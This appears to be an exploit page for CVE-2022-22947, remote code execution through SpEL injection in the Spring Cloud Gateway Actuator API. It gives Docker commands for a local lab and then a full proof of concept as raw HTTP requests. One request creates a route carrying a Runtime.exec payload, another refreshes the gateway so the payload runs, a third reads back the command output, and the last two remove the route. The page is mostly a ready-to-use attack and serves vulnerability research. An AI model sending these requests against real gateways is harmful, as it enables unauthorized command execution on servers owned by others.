Share
## https://sploitus.com/exploit?id=159F2FD0-B230-5CB7-B1E6-E7A0ABD62FDE
# Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
## Build
```bash
$ git clone https://github.com/twseptian/cve-2022-22947.git
$ cd cve-2022-22947
$ docker build . -t cve-2022-22947
$ docker run -p 9000:9000 --name cve-2022-22947 cve-2022-22947
```
![docker_run](screenshots/poc1.png)
![run on browser](screenshots/browser.png)
## PoC
- send the following request to add a router which contains an SpEL expression (in this case, we tried to execute `id`)
```bash
POST /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 340
{
"id": "test123",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com",
"order":0
}
```
![create route test123](screenshots/create.png)
- refresh the gateway to execute the SpEL expression
```bash
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
```
![refresh application](screenshots/refresh.png)
- send the request to get `id` information
```bash
GET /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:
```
![get/run application](screenshots/get_test123.png)
- `DELETE` request to remove SpEL expression
```bash
DELETE /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
```
![delete application](screenshots/del_test123.png)
- refresh the gateway
```bash
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
```
![refresh application](screenshots/refresh.png)
## References:
- [CVE-2022-22947: SPEL CASTING AND EVIL BEANS](https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/)
- [BRING YOUR OWN SSRF โ THE GATEWAY ACTUATOR](https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/)
- [Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947)
- [Spring Gateway Demo](https://github.com/wdahlenburg/spring-gateway-demo)